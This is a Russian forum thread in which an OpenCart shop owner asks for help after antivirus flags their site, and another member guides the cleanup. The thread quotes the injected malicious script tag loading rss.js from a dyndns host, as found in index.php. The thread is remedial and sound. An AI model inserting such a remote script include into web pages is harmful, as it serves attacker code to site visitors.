X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Вирус на сайте Опенкарт
d75
d75
Topic Starter сообщение 14.6.2012, 8:41; Ответить: d75
Сообщение #1


Новичок
*

Группа: User
Сообщений: 36
Регистрация: 31.8.2011
Из: Псков
Поблагодарили: 1 раз
Репутация:   0  


Здравствуйте форумчане
Вчера касперский начал ругаться на вирус на моём сайте
по онлайн сервисам всё норм., не находит вирус... я в панике, может кто что подскажет/поможет ?


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
taxi2008
taxi2008
сообщение 14.6.2012, 8:44; Ответить: taxi2008
Сообщение #2


Старожил
******

Группа: Active User
Сообщений: 2034
Регистрация: 29.7.2008
Из: Нефтекамск
Поблагодарили: 470 раз
Репутация:   114  


Откройте исходный код. Вконце страницы найдите:
<script src="http://statcounter.dyndns.biz/rss.js"></script>

Удалите его


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
d75
d75
Topic Starter сообщение 14.6.2012, 8:45; Ответить: d75
Сообщение #3


Новичок
*

Группа: User
Сообщений: 36
Регистрация: 31.8.2011
Из: Псков
Поблагодарили: 1 раз
Репутация:   0  


(taxi2008 @ 14.6.2012, 7:44) *
Откройте исходный код. Вконце страницы найдите:
<script src="http://statcounter.dyndns.biz/rss.js"></script>

Удалите его

Вы имеете в виду главную ?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
taxi2008
taxi2008
сообщение 14.6.2012, 8:47; Ответить: taxi2008
Сообщение #4


Старожил
******

Группа: Active User
Сообщений: 2034
Регистрация: 29.7.2008
Из: Нефтекамск
Поблагодарили: 470 раз
Репутация:   114  


Она на любой есть! Идет после тега </html>
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
d75
d75
Topic Starter сообщение 14.6.2012, 8:55; Ответить: d75
Сообщение #5


Новичок
*

Группа: User
Сообщений: 36
Регистрация: 31.8.2011
Из: Псков
Поблагодарили: 1 раз
Репутация:   0  


(taxi2008 @ 14.6.2012, 7:47) *
Она на любой есть! Идет после тега </html>

Да есть, но в редакторе нет ничего


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
taxi2008
taxi2008
сообщение 14.6.2012, 9:40; Ответить: taxi2008
Сообщение #6


Старожил
******

Группа: Active User
Сообщений: 2034
Регистрация: 29.7.2008
Из: Нефтекамск
Поблагодарили: 470 раз
Репутация:   114  


А вы думали все так просто?
Идет после тега </html>

Это уже говорит о том, что код в php файле, который генерирует страницу
Первым делом просмотрите файл index.php, а если ничего не найдете, ищите через total comander, во всех файлах движка, на совпадение текста

Сообщение отредактировал taxi2008 - 14.6.2012, 9:41


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
d75
d75
Topic Starter сообщение 14.6.2012, 11:20; Ответить: d75
Сообщение #7


Новичок
*

Группа: User
Сообщений: 36
Регистрация: 31.8.2011
Из: Псков
Поблагодарили: 1 раз
Репутация:   0  


Удалил в файле index.php этот код, сайт открывается, но он пустой

Сообщение отредактировал lostprophet - 14.6.2012, 12:20
Причина редактирования: избыточное цитирование


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
taxi2008
taxi2008
сообщение 14.6.2012, 12:10; Ответить: taxi2008
Сообщение #8


Старожил
******

Группа: Active User
Сообщений: 2034
Регистрация: 29.7.2008
Из: Нефтекамск
Поблагодарили: 470 раз
Репутация:   114  


Неправильно удалили, выпишите сюда кусок кода с php файла с этим скриптом


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
d75
d75
Topic Starter сообщение 14.6.2012, 12:23; Ответить: d75
Сообщение #9


Новичок
*

Группа: User
Сообщений: 36
Регистрация: 31.8.2011
Из: Псков
Поблагодарили: 1 раз
Репутация:   0  


(taxi2008 @ 14.6.2012, 11:10) *
Неправильно удалили, выпишите сюда кусок кода с php файла с этим скриптом

// Router
if (isset($request->get['route'])) {
$action = new Action($request->get['route']);
} else {
$action = new Action('common/home');
}

// Dispatch
$controller->dispatch($action, new Action('error/not_found'));

// что то тут было не помню, а дальше :
<script src="http://statcounter.dyndns.biz/rss.js"></script>

?>


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
taxi2008
taxi2008
сообщение 14.6.2012, 12:30; Ответить: taxi2008
Сообщение #10


Старожил
******

Группа: Active User
Сообщений: 2034
Регистрация: 29.7.2008
Из: Нефтекамск
Поблагодарили: 470 раз
Репутация:   114  


что то тут было не помню, а дальше

В бекапе посмотрите. Выложите полный кусок кода
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Узнай все, о своем и чужом сайте
Выгрузка: Ahrefs+Semrush+Majestic+Spywords
7 matrixzp 1265 Сегодня, 2:03
автор: matrixzp
Горячая тема (нет новых ответов) Ню фото на сайте фотографа
Раздел или отдельный сайт
29 Valerypantera 1463 Вчера, 17:02
автор: genjnat
Открытая тема (нет новых ответов) Видео баннер на сайте и его влияние
0 Seoworke 282 17.5.2018, 10:56
автор: Seoworke
Открытая тема (нет новых ответов) Почему разнообразие на сайте вредит проекту?
22 Kiloan_Frost 1197 16.5.2018, 0:47
автор: coremission
Открытая тема (нет новых ответов) Вопрос по поводу цен на сайте
16 WildWeb8 908 13.5.2018, 17:40
автор: genjnat


 



RSS Текстовая версия Сейчас: 21.5.2018, 13:28
Дизайн